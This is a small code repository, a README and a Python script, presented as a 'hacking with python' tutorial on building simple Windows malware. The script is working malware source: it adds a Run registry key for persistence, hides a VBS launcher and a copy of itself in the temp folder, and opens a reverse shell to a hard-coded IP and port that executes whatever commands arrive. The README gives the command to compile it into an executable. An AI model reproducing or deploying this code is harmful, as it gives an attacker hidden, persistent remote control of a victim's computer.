├── README.md └── malware.py /README.md: -------------------------------------------------------------------------------- 1 | Hacking with python series.. 2 | 3 | This is a tutorial to show how to make a simple malware in python. 4 | 5 | I use a vb script to infect windows reg keys, to make persistence 6 | 7 | 8 | Hope you like =)) 9 | 10 | 11 | regards, 12 | 13 | 14 | To compile: 15 | 16 | pyinstaller.exe --onefile malware.py 17 | 18 | https://www.youtube.com/watch?v=VTHJY0W3Grc 19 | -------------------------------------------------------------------------------- /malware.py: -------------------------------------------------------------------------------- 1 | # HACKING WITH PYTHON 2 | # Simple malware for back connect in python for windows ;) 3 | 4 | # Autor: anarc0der 5 | 6 | import os 7 | import subprocess 8 | import socket 9 | import sys 10 | import tempfile 11 | from _winreg import * 12 | 13 | MALWARE_NAME = "malware.exe" 14 | TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs" 15 | KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run" 16 | KEY_NAME = "anarc0der_key" 17 | REV_SHELL = "192.168.1.106" 18 | SHELL_PORT = 4444 19 | TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER 20 | MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME 21 | 22 | class My_malware(): 23 | 24 | def infect_windows_register_keys(self): 25 | """ Method to register malware on windows keys. 26 | Returns False if didnt have key for malware. 27 | Returns True if already have key for malware. """ 28 | key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH) 29 | keys = [] 30 | try: 31 | i=0 32 | while True: 33 | cur_key = EnumValue(key, i) 34 | keys.append(cur_key[0]) 35 | i+=1 36 | except: 37 | pass 38 | if KEY_NAME not in keys: 39 | mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS) 40 | SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH) 41 | mlwr_key.Close() 42 | return False 43 | return True 44 | 45 | def hide_malware_and_trigger(self): 46 | """ Method to generate & hide the trigger and malware. 47 | Return True if was alredy hided. 48 | Return False if wasnt hided """ 49 | if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH): 50 | return True 51 | else: 52 | payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH) 53 | with open(TRIGGER_PATH, 'w') as f: 54 | f.write(payload) 55 | os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH)) 56 | return False 57 | 58 | def reverse_shell_function(self): 59 | """ Method of reverse shell in python """ 60 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 61 | s.connect((REV_SHELL,SHELL_PORT)) 62 | s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n') 63 | while True: 64 | data = s.recv(1024) 65 | if "quit" in data: 66 | break 67 | cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 68 | saida_cmd = cmd.stdout.read() + cmd.stderr.read() 69 | s.send(saida_cmd) 70 | s.send("Comando: ") 71 | s.close() 72 | 73 | def main(): 74 | my_returns = [] 75 | x = My_malware() 76 | my_returns.append(x.infect_windows_register_keys()) 77 | my_returns.append(x.hide_malware_and_trigger()) 78 | if all(res is True for res in my_returns): 79 | x.reverse_shell_function() 80 | 81 | if __name__ == '__main__': 82 | main() 83 | --------------------------------------------------------------------------------